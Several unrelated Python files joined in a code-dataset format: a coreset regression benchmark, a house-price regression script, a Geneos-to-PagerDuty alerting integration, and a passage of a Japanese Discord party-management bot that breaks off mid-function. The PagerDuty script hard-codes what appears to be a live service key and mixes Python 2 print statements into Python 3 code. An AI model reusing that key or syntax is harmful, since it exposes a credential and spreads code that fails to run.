zeros = np.zeros((add_z, coreset.shape[1]), dtype=dtype)
coreset = np.concatenate((coreset, zeros))
zeros = np.zeros((add_z),dtype=dtype)
new_u = np.concatenate((new_u, zeros))
zeros = np.zeros((add_z, new_b.shape[1]), dtype=dtype)
new_b = np.concatenate((new_b, zeros))
bc = np.concatenate((bc, new_b))
cc = np.concatenate((cc, coreset))
uc = np.concatenate((uc, new_u))
return cc, uc, bc
###################################################################################
# general test whether the fit result match the original problem
def test_model(test_data, test_labels, test_weights, clf):
weighted_test_data = test_data * np.sqrt(test_weights[:, np.newaxis])
weighted_test_labels = test_labels * np.sqrt(test_weights[:, np.newaxis])
score = clf.score(weighted_test_data, weighted_test_labels)
return score
# normal train data methods0
def train_model(data, labels, weights, clf):
time_start = time.time()
weighted_data = data * np.sqrt(weights[:, np.newaxis])
weighted_labels = (labels * np.sqrt(weights[:, np.newaxis])).ravel()
clf.fit(weighted_data, weighted_labels)
time_end = time.time()
return time_end - time_start, clf
# K-fold validation to train, using this paper's coreset method
def coreset_train_model(data, labels, weights, clf, folds=None, solver='ridge'):
time_start = time.time()
coreset, coreset_weights, coreset_labels = stream_coreset(data, weights, labels, folds=folds)
weighted_coreset = coreset * np.sqrt(coreset_weights[:, np.newaxis])
weighted_coreset_labels = (coreset_labels * np.sqrt(coreset_weights[:, np.newaxis])).ravel()
if solver in ['lasso', 'elastic']:
const = np.sqrt(coreset.shape[0] / data.shape[0])
clf.fit(const * weighted_coreset, const * weighted_coreset_labels)
else:
clf.fit(weighted_coreset, weighted_coreset_labels)
time_end = time.time()
return time_end - time_start, clf
def get_new_clf(solver, folds=3, alphas=100):
kf=KFold(n_splits=folds,shuffle=False)
if "linear" == solver:
clf = linear_model.LinearRegression(fit_intercept=False)
if "ridge" == solver:
alphas = np.arange(1/alphas, 10+ 1/alphas, 10/alphas)
clf = linear_model.RidgeCV(alphas=alphas, fit_intercept=False, cv=kf)
elif "lasso" == solver:
clf=linear_model.LassoCV(n_alphas=alphas, fit_intercept=False, cv=kf)
elif "elastic" == solver:
clf = linear_model.ElasticNetCV(n_alphas=alphas, fit_intercept=False, cv=kf)
return clf
def main():
n = 240000
d = 3
data_range = 100
num_of_alphas = 300
folds = 3
data = np.floor(np.random.rand(n, d) * data_range)
labels = np.floor(np.random.rand(n, 1) * data_range)
weights = np.ones(n)
for solver in ["lasso", "ridge", "elastic"]:
#########RIDGE REGRESSION#############
clf = get_new_clf(solver, folds=folds, alphas=num_of_alphas)
time_coreset, clf_coreset = coreset_train_model(data, labels, weights, clf, folds=folds, solver=solver)
score_coreset = test_model(data, labels, weights, clf)
clf = get_new_clf(solver, folds=folds, alphas=num_of_alphas)
time_real, clf_real = train_model(data, labels, weights, clf)
score_real = test_model(data, labels, weights, clf)
print (" solver: {}\n number_of_alphas: {}, \nscore_diff = {}\n---->coef diff = {}\n---->coreset_time = {}\n---->data time = {}".format(
solver,
num_of_alphas,
np.abs(score_coreset - score_real),
np.sum(np.abs(clf_real.coef_ - clf_coreset.coef_)),
time_coreset,
time_real))
############################################
if __name__ == '__main__':
main() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 3 18:44:03 2019
@author: dileepn
Using ScikitLearn for multiple linear regression in order to predict house prices
"""
import numpy as np
from sklearn import linear_model
from sklearn.preprocessing import PolynomialFeatures
from sklearn.metrics.regression import mean_squared_error
import matplotlib.pyplot as plt
# Open the dataset and define X, y, and m
def load_data():
""" This function loads:
1. Space-separated text (*.txt) file using numpy
and returns X and y as numpy arrays. Sample input (last column is y):
2 100
0.44 0.68 511.14
0.99 0.23 717.1
0.84 0.29 607.91
0.28 0.45 270.4
0.07 0.83 289.88
.
.
.
4
0.05 0.54
0.91 0.91
0.31 0.76
0.51 0.31
OR
2. Data entered manually (space-separated) on the standard input
and stores them in X and y. """
while True:
# Prompt user for dataset input type
input_type = input("Choose dataset input type. 1 (file) or 2 (manual entry): ")
if input_type == "1":
# Prompt for filepath
filepath = input("Enter the complete filepath (/home/user...): ")
# Temporary lists to store data as it is being read
temp_data = []
temp_test_data = []
# Read the dataset line-by-line. Get num. of features, F, and
# num. of examples, N
with open(filepath) as input_file:
for line_num, line in enumerate(input_file):
if line_num == 0:
F, N = line.split()
F, N = int(F), int(N)
elif line_num == N + 1:
T = int(line)
elif line_num > 0 and line_num <= N:
x1, x2, y = line.split()
# Store as ordered pair in temp_data
temp_data += [(float(x1), float(x2), float(y))]
elif line_num > N + 1 and line_num <= N + T + 1:
x1, x2 = line.split()
temp_test_data += [(float(x1), float(x2))]
# Convert temp lists into numpy arrays
dataset = np.array(temp_data)
X_pred = np.array(temp_test_data)
# Define X, y, and m
X = dataset[:, :F]
y = dataset[:, F].reshape(-1,1)
break
elif input_type == "2":
# First line has number of features and number of training examples
F, N = map(int, input().split())
# Get the training set (X and y)
train = np.array([input().split() for _ in range(N)], dtype=np.float64)
# Number of test examples
T = int(input())
X_pred = np.array([input().split() for _ in range(T)], dtype=np.float64)
# Split the training set into X and y
X = train[:,:F]
y = train[:,F]
break
else:
print("Incorrect input. Please enter 1 or 2.")
return (X, y, X_pred)
# Load data
X_train, y_train, X_test = load_data()
# Fit the model
model = linear_model.LinearRegression()
#%% Linear regression
model.fit(X_train, y_train)
# Make predictions
y_pred = model.predict(X_test)
# Error metrics
y_test = np.array([105.22, 142.68, 132.94, 129.71])
mse = mean_squared_error(y_test, y_pred)
print("MSE = {:.2f}".format(mse))
#%% Now with polynomial features
poly = PolynomialFeatures(degree = 3)
X_poly = poly.fit_transform(X_train)
X_test_poly = poly.fit_transform(X_test)
model.fit(X_poly, y_train)
y_pred_poly = model.predict(X_test_poly)
for i in range(len(y_pred_poly)):
print("{:.2f}".format(y_pred_poly[i].item()))
|
<gh_stars>0
import requests, base64, json, sys, argparse, os, time
import urllib3
from datetime import datetime
from argparse import RawTextHelpFormatter
# For Supressing warnings
# urllib3.disable_warnings()
#Uber ASCII Art
Uber_Small_ASCII = ("" + \
" .,coxOKXNWMWl \n" + \
" .;okKWMMMMMMMMMWl .. \n" + \
" .:xKWMMMMMMMMMMMMMWd.... 'k0d;. \n" + \
" 'o0WMMMMMMMMMMMMMMMMMNXKKKOkdl:'. ;0WMMW0l. \n" + \
" .dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNKxxKMMMMMMWXo. \n" + \
" .lKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKl. \n" + \
" 'kWMMMMMMMMMMMMMMMMMWX0OxxxxxkO0XWMMMMMMMMMMMMMMMMMWk' \n" + \
" .dNMMMMMMMMMMMMMMW0dc,.. ..,cxKWMMMMMMMMMMMMMMM0; \n" + \
" .'lkXWMMMMMMMMXx;. .;xXMMMMMMMMMMMMMMK: \n" + \
" lNMMMMMMXd' 'dNMMMMMMMMMMMMM0, \n" + \
" ,0MMMMMM0; :0WMMMMMMMMMMMWk.\n" + \
" .kWMMMMMO' ,OMMMMMMMMMMMMNc\n" + \
" cNMMMMMK; 'lxO0OOxl' ;KMMMMMMMMMMMMO\n" + \
" .xMMMMMWo .dNMMMMMMMMXd. .dWMMMMMMMMMMMX\n" + \
" .OMMMMMX: .dWMMMMMMMMMMWo :NMMMMMMMMMMMN\n" + \
"'odkNMMMMMK; .kMMMMMMMMMMMMk. ;XMMMMMMMMWk:;\n" + \
":NMMMMMMMMN: cXMMMMMMMMMMX: cNMMMMMMMMX: \n" + \
",KMMMMMMMMWx. ;kNWMMMMWNk; .xMMMMMMMMM0' \n" + \
".xWMMMMMMMMX: ':lllc:' cXMMMMMMMMWd. \n" + \
" ;KMMMMMMMMMK: :KMMMMMMMMMK, \n" + \
" lNMMMMMMMMMXl. .oXMMMMMMMMMNl \n" + \
" .oNMMMMMMMMMWO:. .:OWMMMMMMMMMNo. \n" + \
" .lXMMMMMMMMMMW0l'. .,o0WMMMMMMMMMMXl. \n" + \
" :0WMMMMMMMMMMMN0dc;'........';ld0NMMMMMMMMMMMW0; \n" + \
" .oXMMMMMMMMMMMMMMWNXK000KKXNWMMMMMMMMMMMMMMXo. \n" + \
" 'dXWMMMWWMMMMMMMMMMMMMMMMMMMMMMMWWMMMMWXd' \n" + \
" .lONNd;cdOXWWMMMMMMMMMMMMWWXOdc:kNNOl. \n" + \
" .cc. .,cx0XNWWMWWWNKOxc,. .oc. \n\n" + \
" - Geneos Integrations for PagerDuty - \n" )
# Modify Environment variables
Usage_Msg = ( Uber_Small_ASCII + \
"\n\tExample for resolving a PagerDuty incident:\n\n" + \
"\t\t" + sys.argv[0] + " -r \"MyGateway\\MyProbe\\MySampler\\MyDataview\\MyIncident\"\n" + \
"\n\tExample for acknowledging a PagerDuty incident:\n\n" + \
"\t\t" + sys.argv[0] + " -a \"MyGateway\\MyProbe\\MySampler\\MyDataview\\MyIncident\"\n")
# Arg Parser https://stackoverflow.com/questions/15753701/argparse-option-for-passing-a-list-as-option https://docs.python.org/2/howto/argparse.html
parser = argparse.ArgumentParser( description= Usage_Msg , formatter_class=RawTextHelpFormatter)
# Typical operations for PagerDuty
parser.add_argument( "-r", "--resolve", help = "resolves targeted Incident", type=str)
parser.add_argument( "-a", "--acknowledge", help = "acknowledges targeted Incident", type=str)
parser.add_argument( "-s", "--servicekey", help = "serivce key from PagerDuty's integration services", type=str)
parser.add_argument( "-t", "--trigger", help = "triggers and creates an Incident in PagerDuty, if no Incident Key is provided then one is generated", type=str)
# global args
args = parser.parse_args()
# Loads the environment variable as JSON structure
# We will use this later
Env_JSON = json.dumps(dict(**os.environ), sort_keys=True, indent=4)
EnvData = json.loads(Env_JSON)
# Pre-Reqs
SERVICE_KEY = "3e2966c4fe574b978ca0db7414d5e504" # Variablize this value
# If we supplied a service key
if (args.servicekey):
SERVICE_KEY = args.servicekey # Variablize this value
GENEOS_PAYLOAD = {} # Massive Payload of geneos information
# Incident Key (x,y of our geneos integration)
# WARNING :: PagerDuty has 255 Character Limit
if not (args.acknowledge) and not (args.trigger) and not (args.resolve):
INCIDENT_KEY = EnvData["_GATEWAY"] + "\\" + EnvData["_PROBE"] + "\\" + EnvData["_MANAGED_ENTITY"] + "\\" + EnvData["_SAMPLER"] + "\\" + EnvData["_DATAVIEW"] + "\\" + EnvData["_ROWNAME"] + "\\" + EnvData["_COLUMN"]
elif (args.acknowledge):
INCIDENT_KEY = (args.acknowledge)
elif (args.resolve):
INCIDENT_KEY = (args.resolve)
# elif (args.trigger):
# INCIDENT_KEY = (args.trigger)
# For Testing the script, in leiu of any proxy configuration to test against
# export _GATEWAY="SomeGateway"
# export _PROBE="SomeProbe"
# export _SAMPLER="SomeSampler"
# export _MANAGED_ENTITY="SomeEntity"
# export _DATAVIEW="SomeDataview"
# export _ROWNAME="SomeRowName"
# export _SEVERITY="CRITICAL"
# export _PREVIOUS_SEV="2"
# apiKey = "<KEY>"
pagerduty_session = requests.Session()
# time now
unix_time = time.time()
human_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# Incident interactions
def event_trigger_incident():
# Triggers a PagerDuty incident without a previously generated incident key
# Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
if(args.trigger):
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "trigger",
# "dedup_key": INCIDENT_KEY,
# "integration_key": INCIDENT_KEY,
"payload": {
"summary" : "Alerted from an Active Console",
"severity": "critical",
"source" : "Active Console",
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
else:
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "trigger",
"dedup_key": INCIDENT_KEY,
"payload": {
"summary" : "Alert on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"] + " - Date: " + human_time + " - Row: " + EnvData["_ROWNAME"] + " : " + EnvData["_COLUMN"] + " at " + EnvData["_VALUE"],
"severity": "critical",
"source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time,
"_SEVERITY" : EnvData["_SEVERITY"]
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
# Re-Cconstruct Payload for Geneos Event Data
for EnvKey in EnvData:
if EnvKey.startswith("_"):
payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
# Run post to PagerDuty Server
PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
# response.encoding = 'utf-8'
if PagerResponse.status_code != 202:
raise ValueError(
'Request to PagerDuty a server returned an error %s, the response is:\n%s'
% (PagerResponse.status_code, PagerResponse.text)
)
# If all is good
if PagerResponse.json()["status"] == "success":
print ('Incident Created')
else:
print PagerResponse.text # print error message if not successful
# Print json response info to the screen
print(json.dumps(PagerResponse.json(), indent=2))
def cmd_trigger_incident():
# Triggers a PagerDuty incident without a previously generated incident key
# Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
if(args.trigger):
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "trigger",
"dedup_key": INCIDENT_KEY,
"integration_key": INCIDENT_KEY,
"payload": {
"summary" : "Alerted from an Active Console",
"severity": "critical",
"source" : "Active Console",
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
else:
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "trigger",
"dedup_key": INCIDENT_KEY,
"payload": {
"summary" : "Alert on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"] + " - Date: " + human_time + " - Row: " + EnvData["_ROWNAME"] + " : " + EnvData["_COLUMN"] + " at " + EnvData["_VALUE"],
"severity": "critical",
"source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time,
"_SEVERITY" : EnvData["_SEVERITY"]
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
# Re-Cconstruct Payload for Geneos Event Data
for EnvKey in EnvData:
if EnvKey.startswith("_"):
payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
# Run post to PagerDuty Server
PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
# response.encoding = 'utf-8'
if PagerResponse.status_code != 202:
raise ValueError(
'Request to PagerDuty a server returned an error %s, the response is:\n%s'
% (PagerResponse.status_code, PagerResponse.text)
)
# If all is good
if PagerResponse.json()["status"] == "success":
print ('Incident Created')
else:
print PagerResponse.text # print error message if not successful
# Print json response info to the screen
print(json.dumps(PagerResponse.json(), indent=2))
def event_ack_incident():
"""Acknowledges a triggered incident using the customer's API access key and incident key via Events API."""
header = {
"Content-Type": "application/json"
}
if (args.acknowledge):
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "acknowledge",
"dedup_key": INCIDENT_KEY,
"integration_key": INCIDENT_KEY,
"payload": {
"summary" : "Acknowledged on Active Console",
"severity": "warning",
"source" : "Manualy Acknowledged",
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
else:
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "acknowledge",
"dedup_key": INCIDENT_KEY,
"integration_key": INCIDENT_KEY,
"payload": {
"summary" : "Acknowledged on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"severity": "warning",
"source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time,
"_SEVERITY" : EnvData["_SEVERITY"]
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
# Re-Cconstruct Payload for Geneos Event Data
for EnvKey in EnvData:
if EnvKey.startswith("_"):
payload["payload"]["custom_details"]["Geneos Event Data"][EnvKey] = EnvData[EnvKey]
# Post to PagerDuty Server
PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
# If all is good
if PagerResponse.json()["status"] == "success":
print ('Incident Acknowledged ')
else:
print PagerResponse.text # print error message if not successful
# response.encoding = 'utf-8'
if PagerResponse.status_code != 202:
raise ValueError(
'Request to PagerDuty a server returned an error %s, the response is:\n%s'
% (PagerResponse.status_code, PagerResponse.text)
)
# Load up the Checks found
# Check_Found = PagerResponse.json()
# Print json response info to the screen
print(json.dumps(PagerResponse.json(), indent=2))
def event_resolve_incident():
"""Resolves a PagerDuty incident using customer's API access key and incident key via Events API."""
header = {
"Content-Type": "application/json"
}
if (args.resolve):
# JSON payload
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY,
"payload": {
"summary" : "Resolved from Active Console",
"severity": "info",
"source" : "from Active Console",
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
else:
# JSON payload
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": SERVICE_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY,
"payload": {
"summary" : "Resolved on " + EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"severity": "info",
"source" : EnvData["_PROBE"] + "/" + EnvData["_HOSTNAME"],
"custom_details" : {
"Geneos Event Data" : {
"HUMAN_TIME" : human_time,
"UNIX_TIME" : unix_time
},
"Custom Message" : "Use custom detailed here Message"
}
}
}
PagerResponse = pagerduty_session.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
if PagerResponse.json()["status"] == "success":
print ('Incident Resolved ')
else:
print PagerResponse.text # print error message if not successful
# response.encoding = 'utf-8'
if PagerResponse.status_code != 202:
raise ValueError(
'Request to PagerDuty a server returned an error %s, the response is:\n%s'
% (PagerResponse.status_code, PagerResponse.text)
)
# Print json response info to the screen
print(json.dumps(PagerResponse.json(), indent=2))
if __name__ == '__main__':
if (args.acknowledge):
# user_ack_incident(args.acknowledge)
event_ack_incident()
elif (args.resolve):
# user_resolve_incident(args.resolve)
event_resolve_incident()
elif (args.trigger):
# user_trigger_incident(args.trigger)
event_trigger_incident()
elif "_SEVERITY" in EnvData:
if (EnvData["_SEVERITY"] == "CRITICAL"):
# Trigger or Update an open incident
event_trigger_incident()
if (EnvData["_SEVERITY"] == "WARNING") :
# Acknowledges an incident
event_ack_incident()
if (EnvData["_SEVERITY"] == "OK") or (EnvData["_SEVERITY"] == "UNDEFINED"):
# Trigger or Update an open incident
event_resolve_incident()
|
<filename>platoonbot.py
# インストールした discord.py を読み込む
from collections import deque
from sys import version
from discord import channel
import discord
TOKEN = ''
client = discord.Client()
CHANNEL_ID_PARTY_1 = 000000000000000000 #小隊チャンネル1
CHANNEL_ID_PARTY_2 = 000000000000000000 #小隊チャンネル2
CHANNEL_ID_PARTY_3 = 000000000000000000 #小隊チャンネル3
CHANNEL_ID_PARTY_LOBBY = 000000000000000000 #小隊情報表示用チャンネル
MSG_ID_1= 000000000000000000 #小隊情報表示用メッセージ1
MSG_ID_2= 000000000000000000 #小隊情報表示用メッセージ2
MSG_ID_3= 000000000000000000 #小隊情報表示用メッセージ3
party_status = True
party_status2 = True
party_status3 = True
party_member = 1
party_member2 = 1
party_member3 = 1
langmode = 0
langmode2 = 0
langmode3 = 0
make_name1 = str()
make_name2 = str()
make_name3 = str()
# 初回使用時に小隊情報表示用チャンネルに小隊情報表示作成用メッセージ作成
async def make_platoon_info():
channel = client.get_channel(CHANNEL_ID_PARTY_LOBBY)
await channel.send('Platoon1 : 空')
await channel.send('Platoon2 : 空')
await channel.send('Platoon3 : 空')
# 起動時に動作する処理
@client.event
async def on_ready():
# 起動したらターミナルにログイン通知が表示される
print('ログインしました')
activity = discord.Game(name="/hplahelp | /hplahelp -en")
await client.change_presence(status=discord.Status.idle, activity=activity)
# await make_platoon_info() #初回使用時だけ有効化する
# メッセージ受信時に動作する処理
@client.event
async def on_message(message):
global party_status,party_status2,party_status3,party_member,party_member2,party_member3,langmode,langmode2,langmode3,make_name1,make_name2,make_name3
# メッセージ送信者がBotだった場合は無視する
if message.author.bot:
return
if message.content == "/hplahelp":
await message.author.send("/hplahelp -en: display english platoon cmd help\n/hmake [小隊名]:小隊を作成します\n/hjoin:小隊に参加します\n/hleave:小隊から抜けます\n/hstatus:メンバーを表示します\n/hbreak:小隊を解散します\n/hlja:言語モードを日本語にします\n/hlen:change lang mode english")
if message.content == "/hplahelp -en":
await message.author.send("/hmake [platoon name]:make a platoon\n/hjoin:join platoon\n/hleave:leave platoon\n/hstatus:display platoon member\n/hbreak:break platoon\n/hlja:change lang mode japanese\n/hlen:change lang mode english")
# 小隊bot1
if message.channel.id == CHANNEL_ID_PARTY_1:
def check_user_exist():
with open("party.txt") as temp_f:
datafile = temp_f.readlines()
for line in datafile:
if str(message.author) in line:
return True
return False
make_name = str()
if message.content == "/hlja":
langmode = 0
await message.channel.send("言語モードを日本語に設定しました")
if message.content =="/hlen":
langmode = 1
await message.channel.send("Lang mode change english")
if message.content.startswith("/hmake"):
if party_status:
make_name = message.content[7:]
party_status = False
party_member = 1
if langmode == 0:
await message.channel.send(str(message.author)+"さんが"+str(make_name)+"を作成しました ["+str(party_member)+"/5]")
elif langmode == 1:
await message.channel.send(str(message.author)+" make a "+str(make_name)+" ["+str(party_member)+"/5]")
f = open("party.txt","w")
f.write(str(message.author)+"\n")
f.close()
elif party_status == False:
if langmode == 0:
await message.channel.send("既に小隊が存在します")
elif langmode == 1:
await message.channel.send("platoon already exist")
if message.content == "/hjoin":
if check_user_exist():
if langmode == 0:
await message.channel.send("既に参加しています")
elif langmode == 1:
await message.channel.send("you already join a platoon")
else:
if party_status == False and party_member < 5:
party_member += 1
if langmode == 0:
await message.channel.send(str(message.author)+"さんが小隊に参加しました ["+str(party_member)+"/5]")
elif langmode == 1:
await message.channel.send(str(message.author)+" join a platoon ["+str(party_member)+"/5]")
f = open("party.txt","a")
f.write(str(message.author)+"\n")
f.close()
elif party_member >= 5:
if langmode == 0:
await message.channel.send("満員のため参加できません")
elif langmode == 1:
await message.channel.send("you cant join because a platoon is full")
elif party_status:
if langmode == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hleave":
if check_user_exist() == False:
if langmode == 0:
await message.channel.send("あなたは小隊に参加していません")
elif langmode == 1:
await message.channel.send("you arent join a platoon")
else:
if party_status == False and party_member > 1:
party_member -= 1
if langmode == 0:
await message.channel.send(str(message.author)+"さんが小隊を退出しました ["+str(party_member)+"/5]")
elif langmode == 1:
await message.channel.send(str(message.author)+" leave a party ["+str(party_member)+"/5]")
leave_user = str(message.author)
with open("party.txt","r") as f:
fileText = f.read()
after = fileText.replace(leave_user,"")
with open("party.txt","w") as f:
f.write(after)
elif party_status == False and party_member <= 1:
if langmode == 0:
await message.channel.send("メンバーがいなくなったため解散します")
elif langmode == 1:
await message.channel.send("break a platoon because all member missed")
party_status = True
elif party_status:
if langmode == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hstatus":
if party_status == False:
f = open("party.txt","r")
data = f.read()
await message.channel.send(str(make_name)+"\n"+data+"\n["+str(party_member)+"/5]")
f.close()
elif party_status:
if langmode == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hbreak":
if check_user_exist():
if party_status == False:
if langmode == 0:
await message.channel.send("正常に解散されました")
elif langmode == 1:
await message.channel.send("break a party successfully")
party_status = True
elif party_status:
if langmode == 0:
await message.channel.send("小隊が存在しないため解散できません")
elif langmode == 1:
await message.channel.send("cant break a party because party doesnt exist")
else:
if langmode == 0:
await message.channel.send("あなたは小隊に参加していないため、小隊を解散することはできません")
elif langmode == 1:
await message.channel.send("you cant break a party, because you arent join the party")
make_name1 = make_name
await change_platoon_info()
# 小隊bot2
elif message.channel.id == CHANNEL_ID_PARTY_2:
def check_user_exist():
with open("party2.txt") as temp_f:
datafile = temp_f.readlines()
for line in datafile:
if str(message.author) in line:
return True
return False
make_name = str()
if message.content == "/hlja":
langmode2 = 0
if message.content =="/hlen":
langmode2 = 1
if message.content.startswith("/hmake"):
if party_status2:
make_name = message.content[7:]
party_status2 = False
party_member2 = 1
if langmode2 == 0:
await message.channel.send(str(message.author)+"さんが"+str(make_name)+"を作成しました ["+str(party_member2)+"/5]")
elif langmode2 == 1:
await message.channel.send(str(message.author)+" make a "+str(make_name)+" ["+str(party_member2)+"/5]")
f = open("party2.txt","w")
f.write(str(message.author)+"\n")
f.close()
elif party_status2 == False:
if langmode2 == 0:
await message.channel.send("既に小隊が存在します")
elif langmode2 == 1:
await message.channel.send("platoon already exist")
if message.content == "/hjoin":
if check_user_exist():
if langmode2 == 0:
await message.channel.send("既に参加しています")
elif langmode2 == 1:
await message.channel.send("you already join a platoon")
else:
if party_status2 == False and party_member2 < 5:
party_member2 += 1
if langmode2 == 0:
await message.channel.send(str(message.author)+"さんが小隊に参加しました ["+str(party_member2)+"/5]")
elif langmode2 == 1:
await message.channel.send(str(message.author)+" join a platoon ["+str(party_member2)+"/5]")
f = open("party2.txt","a")
f.write(str(message.author)+"\n")
f.close()
elif party_member2 >= 5:
if langmode2 == 0:
await message.channel.send("満員のため参加できません")
elif langmode2 == 1:
await message.channel.send("you cant join because a platoon is full")
elif party_status2:
if langmode2 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode2 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hleave":
if check_user_exist() == False:
if langmode2 == 0:
await message.channel.send("あなたは小隊に参加していません")
elif langmode2 == 1:
await message.channel.send("you arent join a platoon")
else:
if party_status2 == False and party_member2 > 1:
party_member2 -= 1
if langmode2 == 0:
await message.channel.send(str(message.author)+"さんが小隊を退出しました ["+str(party_member2)+"/5]")
elif langmode2 == 1:
await message.channel.send(str(message.author)+" leave a party ["+str(party_member2)+"/5]")
leave_user = str(message.author)
with open("party2.txt","r") as f:
fileText = f.read()
after = fileText.replace(leave_user,"")
with open("party2.txt","w") as f:
f.write(after)
elif party_status2 == False and party_member2 <= 1:
if langmode2 == 0:
await message.channel.send("メンバーがいなくなったため解散します")
elif langmode2 == 1:
await message.channel.send("break a platoon because all member missed")
party_status2 = True
elif party_status2:
if langmode2 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode2 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hstatus":
if party_status2 == False:
f = open("party2.txt","r")
data = f.read()
await message.channel.send(str(make_name)+"\n"+data+"\n["+str(party_member2)+"/5]")
f.close()
elif party_status2:
if langmode2 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode2 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hbreak":
if check_user_exist():
if party_status2 == False:
if langmode2 == 0:
await message.channel.send("正常に解散されました")
elif langmode2 == 1:
await message.channel.send("break a party successfully")
party_status2 = True
elif party_status2:
if langmode2 == 0:
await message.channel.send("小隊が存在しないため解散できません")
elif langmode2 == 1:
await message.channel.send("cant break a party because party doesnt exist")
else:
if langmode2 == 0:
await message.channel.send("あなたは小隊に参加していないため、小隊を解散することはできません")
elif langmode2 == 1:
await message.channel.send("you cant break a party, because you arent join the party")
make_name2 = make_name
await change_platoon_info()
# 小隊bot3
elif message.channel.id == CHANNEL_ID_PARTY_3:
def check_user_exist():
with open("party3.txt") as temp_f:
datafile = temp_f.readlines()
for line in datafile:
if str(message.author) in line:
return True
return False
make_name = str()
if message.content == "/hlja":
langmode3 = 0
if message.content =="/hlen":
langmode3 = 1
if message.content.startswith("/hmake"):
if party_status3:
make_name = message.content[7:]
party_status3 = False
party_member3 = 1
if langmode3 == 0:
await message.channel.send(str(message.author)+"さんが"+str(make_name)+"を作成しました ["+str(party_member3)+"/5]")
elif langmode3 == 1:
await message.channel.send(str(message.author)+" make a "+str(make_name)+" ["+str(party_member3)+"/5]")
f = open("party3.txt","w")
f.write(str(message.author)+"\n")
f.close()
elif party_status3 == False:
if langmode3 == 0:
await message.channel.send("既に小隊が存在します")
elif langmode3 == 1:
await message.channel.send("platoon already exist")
if message.content == "/hjoin":
if check_user_exist():
if langmode3 == 0:
await message.channel.send("既に参加しています")
elif langmode3 == 1:
await message.channel.send("you already join a platoon")
else:
if party_status3 == False and party_member3 < 5:
party_member3 += 1
if langmode3 == 0:
await message.channel.send(str(message.author)+"さんが小隊に参加しました ["+str(party_member3)+"/5]")
elif langmode3 == 1:
await message.channel.send(str(message.author)+" join a platoon ["+str(party_member3)+"/5]")
f = open("party3.txt","a")
f.write(str(message.author)+"\n")
f.close()
elif party_member3 >= 5:
if langmode3 == 0:
await message.channel.send("満員のため参加できません")
elif langmode3 == 1:
